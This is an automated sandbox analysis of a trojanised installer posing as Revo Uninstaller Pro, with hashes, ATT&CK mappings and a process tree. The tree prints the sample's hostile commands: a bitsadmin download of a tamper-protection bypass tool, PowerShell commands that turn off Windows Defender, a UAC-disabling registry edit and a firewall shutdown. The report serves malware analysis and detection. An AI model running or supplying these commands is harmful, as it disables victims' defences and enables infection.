Overview

overview

10

Static

static

3

7076117f0c...18.exe

windows7-x64

10

7076117f0c...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23/10/2024, 19:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe

  • Size

    18.6MB

  • MD5

    7076117f0c6d84ffd59192a4b1e7208f

  • SHA1

    08b793fc796ea5ef45f5a0d3ca989d2a2852a279

  • SHA256

    621d9de231168a4edd7b0d2bfb27f24165a1996c7a540e51fa31317a506a6518

  • SHA512

    b4f30483d16a6a38afedb91bba320e051be8a0ea94ed0e23c33f4fe0828d0ff08d8a0663aea6b2c5945b9649605217722037d2d214c3167d99fc90310160ff9a

  • SSDEEP

    393216:bsPcjinkzVPjpLnWsDkCSDCe0nz5QVIGKXTpchSpMtm9LZ0+ecQwX:bgFn0DLnC0zuuGKjpch4++em

Score
10/10
discoverydropperevasionexecutionpersistenceprivilege_escalationtrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Drops file in Drivers directory 3 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
    evasion
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    persistenceprivilege_escalation
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 23 IoCs
  • Modifies system executable filetype association 2 TTPs 4 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 37 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3052
    • C:\Users\Admin\AppData\Local\Temp\is-11UFQ.tmp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-11UFQ.tmp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp" /SL5="$400F4,18678062,848384,C:\Users\Admin\AppData\Local\Temp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2292
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\RPKxchvc43an\5jayrzw1q.vbs"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2860
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\RPKxchvc43an\avNIprUwIk.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2896
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2952
          • C:\Windows\SysWOW64\bitsadmin.exe
            bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
            5⤵
            • Download via BitsAdmin
            • System Location Discovery: System Language Discovery
            PID:2880
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2816
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1512
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1988
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
            5⤵
            • UAC bypass
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3028
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2160
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -PUAProtection disable"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2076
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1968
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1980
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1620
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2072
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2472
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2356
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1680
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1936
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1596
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1580
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "netsh advfirewall set allprofiles state off"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2768
            • C:\Windows\SysWOW64\netsh.exe
              "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
              6⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:2308
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\RPKxchvc43an\main.bat" "
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:380
          • C:\Windows\SysWOW64\mode.com
            mode 65,10
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2116
          • C:\ProgramData\RPKxchvc43an\7z.exe
            7z.exe e file.zip -p___________24467pwd13287pwd30257___________ -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1476
          • C:\ProgramData\RPKxchvc43an\7z.exe
            7z.exe e extracted/file_2.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1956
          • C:\ProgramData\RPKxchvc43an\7z.exe
            7z.exe e extracted/file_1.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2104
          • C:\ProgramData\RPKxchvc43an\afcdpsrv.exe
            "afcdpsrv.exe"""
            5⤵
            • Looks for VirtualBox Guest Additions in registry
            • Looks for VMWare Tools registry key
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Maps connected drives based on registry
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2612
            • C:\ProgramData\RPKxchvc43an\afcdpsrv.exe
              "C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"
              6⤵
              • Executes dropped EXE
              PID:2196
            • C:\ProgramData\RPKxchvc43an\afcdpsrv.exe
              "C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"
              6⤵
              • Executes dropped EXE
              PID:2152
            • C:\ProgramData\RPKxchvc43an\afcdpsrv.exe
              "C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"
              6⤵
              • Executes dropped EXE
              PID:1920
            • C:\ProgramData\RPKxchvc43an\afcdpsrv.exe
              "C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"
              6⤵
              • Executes dropped EXE
              PID:608
            • C:\ProgramData\RPKxchvc43an\afcdpsrv.exe
              "C:\ProgramData\RPKxchvc43an\afcdpsrv.exe"
              6⤵
              • Executes dropped EXE
              PID:2396
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c ""C:\ProgramData\RPKxchvc43an\delXPDUR9c.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2692
          • C:\Windows\SysWOW64\timeout.exe
            timeout /T 180 /NOBREAK
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:2880
      • C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
        "C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3068
        • C:\Users\Admin\AppData\Local\Temp\is-GH3UE.tmp\Revo Uninstaller Pro 4.2.3.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-GH3UE.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$3016E,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          PID:2636
          • C:\Windows\system32\rundll32.exe
            "rundll32.exe " SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
            5⤵
            • Drops file in Drivers directory
            • Adds Run key to start application
            • Drops file in Windows directory
            • Suspicious use of AdjustPrivilegeToken
            PID:2208
            • C:\Windows\system32\runonce.exe
              "C:\Windows\system32\runonce.exe" -r
              6⤵
              • Checks processor information in registry
              PID:1812
              • C:\Windows\System32\grpconv.exe
                "C:\Windows\System32\grpconv.exe" -o
                7⤵
                  PID:1980
            • C:\Windows\system32\regsvr32.exe
              "regsvr32" "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" /s
              5⤵
              • Loads dropped DLL
              • Modifies system executable filetype association
              • Modifies registry class
              PID:1912
            • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
              "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:1532
            • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
              "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              PID:2220
            • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
              "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
              5⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              PID:1916
    • C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe
      C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
      1⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2008

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Persistence

    BITS Jobs

    1
    T1197

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Event Triggered Execution

    3
    T1546

    Change Default File Association

    1
    T1546.001

    Component Object Model Hijacking

    1
    T1546.015

    Netsh Helper DLL

    1
    T1546.007

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Event Triggered Execution

    3
    T1546

    Change Default File Association

    1
    T1546.001

    Component Object Model Hijacking

    1
    T1546.015

    Netsh Helper DLL

    1
    T1546.007

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    BITS Jobs

    1
    T1197

    Impair Defenses

    2
    T1562

    Disable or Modify System Firewall

    1
    T1562.004

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    3
    T1112

    Virtualization/Sandbox Evasion

    2
    T1497

    Credential Access

    Discovery

    Peripheral Device Discovery

    1
    T1120

    Query Registry

    7
    T1012

    System Information Discovery

    5
    T1082

    System Location Discovery

    1
    T1614

    System Language Discovery

    1
    T1614.001

    Virtualization/Sandbox Evasion

    2
    T1497

    Lateral Movement

    Collection

    Command and Control

    Web Service

    1
    T1102

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.ini
      Filesize

      111KB

      MD5

      c37fb8c46d0281dd27768fd1101614f0

      SHA1

      03e736a49687f9ac10b35cc791e7df5b7e55f4d8

      SHA256

      ee2e68e61821054a1946efd0260f7e70c3f338765d04edca7625d05677fd980c

      SHA512

      b074f71e06c38f484573edde490f85792ada589e953e96d64188461f41e8ca4d0a90a6fc081ec36e4dc0067337abeea567c40b4e4fd89522497b1ba735262776

      Download Submit

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.ini
      Filesize

      114KB

      MD5

      6c9dbe894ea20eb190db6b483f17030d

      SHA1

      1bac02001cba8c083b987264f1bb89b05b74155f

      SHA256

      24ffc231de9a4573b4ae743555c43dcc550ff8455ea681c788e50bda03a3a846

      SHA512

      b0941e0026ba9117d3cf846e89723dede9f9a00dde688dbf90715244cfdc38b75b579e1c02c788626b16cb6875934341fd2acb685c145389ccd629df9355f62a

      Download Submit

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
      Filesize

      2KB

      MD5

      edc78deb34de240c787b1011161e9a4e

      SHA1

      2d31275530dce33d3bc329991c8ad59e1b303577

      SHA256

      69569b4b111035cd35186da239d8241cf96350f6bb296210368ebc570fa2162b

      SHA512

      e55eefcc39b7353ef11a778910400c5c85cab9657bb350840988cbbf556dc343a9c1803442643c9255c149f8d93a5c2d2e6c3bea244f67c895e635eaec0a0f7b

      Download Submit

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
      Filesize

      9.6MB

      MD5

      1dd8459f2595e4c0603ad491590f6952

      SHA1

      607efe3c74388fb1e4b19f8f7ed2520ebfc349a1

      SHA256

      5bd688f49ff03dd91e3e88fc6c66d495f72afa617c4363b69c29c4ca5016fc4d

      SHA512

      c89c0d8457800642b1b165098d9c6def13a6e56d2ad20fb13b4cf2598d278940036d34a3657a1e07cb0028240000ef3c1dcd3b9c4def0fd861aae684db60c22d

      Download Submit

    • C:\ProgramData\RPKxchvc43an\5jayrzw1q.vbs
      Filesize

      96KB

      MD5

      c84933bcccf41369ef9ecce015b86ed0

      SHA1

      624713276ae217d8d05c03598eecd31209c7f77a

      SHA256

      ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679

      SHA512

      221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363

      Download Submit

    • C:\ProgramData\RPKxchvc43an\7z.exe
      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

      Download Submit

    • C:\ProgramData\RPKxchvc43an\avNIprUwIk.bat
      Filesize

      22KB

      MD5

      b0a7842dd51df8942bc8b837282d1c2b

      SHA1

      0e9432597657c28ca9ac766ac7bf0a903d6aeb3b

      SHA256

      4a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8

      SHA512

      b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\93D4PXG4ZE155RCH4OQJ.temp
      Filesize

      7KB

      MD5

      ea33944eb622fb5332cf35788364e11d

      SHA1

      1ff1af45ff0373d13c037bc6154d6cf1511bd3d7

      SHA256

      677dd8ef68601a92a918e5be910ca5f73e79027d0c7ef115f39a4a730c8ff290

      SHA512

      f7126dcb1709e11f11b41a5a02456bd1edd09c1c4703c13a28af971a50f1f329c9e24adab4bd8bc888c7c7114fc49cf129ef57802be15d31069066e4a296676a

      Download Submit

    • C:\Windows\System32\drivers\revoflt.sys
      Filesize

      39KB

      MD5

      498c3d4d44382a96812a0e0ff28d575b

      SHA1

      c34586b789ca5fe4336ab23ad6ff6eeb991c9612

      SHA256

      23cb784547268cf775636b07cac4c00b962fd10a7f9144d5d5886a9166919bba

      SHA512

      ce450128e9ca1675eab8aa734dc907dfc55f3dacd62503339080d6bd47b2523d063786dbe28e6833db041f1d5869670be2411a39c7b8d93d05a98b4c09cad1a1

      Download Submit

    • \Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
      Filesize

      14.2MB

      MD5

      dc21d689cfa1860e8820ed0ee45b1f2a

      SHA1

      acf2db6df76114601a2e58097629e0c8cbce129b

      SHA256

      01732d1f4d7862d00321ff4972d1d278825958c382c77fec6cdd9ced28a28d0c

      SHA512

      a4a87e46fccd0c7c99331fa13271bc663d4e5f5c03423da20474de0c62dc79af7ab9b39ca834b7965eeba2702394bfb0250bff87bce4dadb280ba364a7475140

      Download Submit

    • \Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll
      Filesize

      188KB

      MD5

      75d7bf3468669a6c3df6f4d048315128

      SHA1

      678d3b531738573520367b47c0cd52cf5e431fa0

      SHA256

      927eea7dfec57f598e6f1850aebe3c3bc8061e5690bc84ba3dc03f5b35980bae

      SHA512

      9c5a170f5654c4e6378092dfbd56e2a41b364dc212429efa388cb8a162bff3fda977bf0328c7515fc4ec7ef1098f65ff5f63106b76d3f36e66ce9801294cde9e

      Download Submit

    • \Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
      Filesize

      23.7MB

      MD5

      ddb041550a3e69764cd9d7d3de3636f3

      SHA1

      1ad9b13a6627c1e6f258951965e39ba9cfd9cb1c

      SHA256

      54e416d5e3bfdd83cde4c9b42deb8839d1190369c12325aa324bd986210a6975

      SHA512

      00498cc2563e92d1b294dda04308aa77219d7e0b59c993ed61200d0ed641650f1d941147eb4e973fc92a7946e79c722607ceb3e1da5ce4b9f52ff3ce6cc8d800

      Download Submit

    • \Users\Admin\AppData\Local\Temp\is-11UFQ.tmp\7076117f0c6d84ffd59192a4b1e7208f_JaffaCakes118.tmp
      Filesize

      3.0MB

      MD5

      40a7717c92235c89dfcc686c6c944653

      SHA1

      7a625cd006a6fbaa90f777b03e920e195fa3edd9

      SHA256

      a1ddf79410b81fd2368c0b02fa30e10a1029c994216b67bab98b7d7ffd63d9a5

      SHA512

      c98a32f9034c931538ef5f74aa177c63334cf1b562c97450985b04813bcf8d7b5e66d58ab68d23673a634260aab7be4c7873e1badfdd1262c2dc37464fac61d7

      Download Submit

    • \Users\Admin\AppData\Local\Temp\is-ETK61.tmp\_isetup\_shfoldr.dll
      Filesize

      22KB

      MD5

      92dc6ef532fbb4a5c3201469a5b5eb63

      SHA1

      3e89ff837147c16b4e41c30d6c796374e0b8e62c

      SHA256

      9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

      SHA512

      9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

      Download Submit

    • \Users\Admin\AppData\Local\Temp\is-ETK61.tmp\b2p.dll
      Filesize

      22KB

      MD5

      ab35386487b343e3e82dbd2671ff9dab

      SHA1

      03591d07aea3309b631a7d3a6e20a92653e199b8

      SHA256

      c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

      SHA512

      b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

      Download Submit

    • \Users\Admin\AppData\Local\Temp\is-ETK61.tmp\botva2.dll
      Filesize

      37KB

      MD5

      67965a5957a61867d661f05ae1f4773e

      SHA1

      f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

      SHA256

      450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

      SHA512

      c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

      Download Submit

    • \Users\Admin\AppData\Local\Temp\is-ETK61.tmp\iswin7logo.dll
      Filesize

      39KB

      MD5

      1ea948aad25ddd347d9b80bef6df9779

      SHA1

      0be971e67a6c3b1297e572d97c14f74b05dafed3

      SHA256

      30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

      SHA512

      f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

      Download Submit

    • \Users\Admin\AppData\Local\Temp\is-GH3UE.tmp\Revo Uninstaller Pro 4.2.3.tmp
      Filesize

      982KB

      MD5

      74f1186a6d3bc01716681712c6b24a74

      SHA1

      9c015d4a4d4a9c7ee4619ea2e2068143c3b81e18

      SHA256

      d4c2a4940f43e5bdab3963fb2a357f52ae6866e6dc4426909f828b2228af814d

      SHA512

      bea8504e1b2244ac425cde33a34d6ac5e6f77d75050c6646d7abebbdaf9d0eab91ca7e4e41abea2aed9c55c445d1c924a62d46a9b08bfe81661982fdf14e20e0

      Download Submit

    • \Users\Admin\AppData\Local\Temp\is-RU6S1.tmp\_isetup\_iscrypt.dll
      Filesize

      2KB

      MD5

      a69559718ab506675e907fe49deb71e9

      SHA1

      bc8f404ffdb1960b50c12ff9413c893b56f2e36f

      SHA256

      2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

      SHA512

      e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

      Download Submit

    • memory/1532-321-0x0000000000400000-0x0000000000E32000-memory.dmp

      Filesize

      10.2MB

      Download

    • memory/2008-349-0x0000000000400000-0x0000000000E32000-memory.dmp

      Filesize

      10.2MB

      Download

    • memory/2292-47-0x0000000000400000-0x0000000000716000-memory.dmp

      Filesize

      3.1MB

      Download

    • memory/2292-12-0x0000000000400000-0x0000000000716000-memory.dmp

      Filesize

      3.1MB

      Download

    • memory/2612-365-0x0000000000380000-0x0000000000454000-memory.dmp

      Filesize

      848KB

      Download

    • memory/2612-367-0x0000000004FF0000-0x000000000504E000-memory.dmp

      Filesize

      376KB

      Download

    • memory/2612-366-0x0000000000600000-0x0000000000622000-memory.dmp

      Filesize

      136KB

      Download

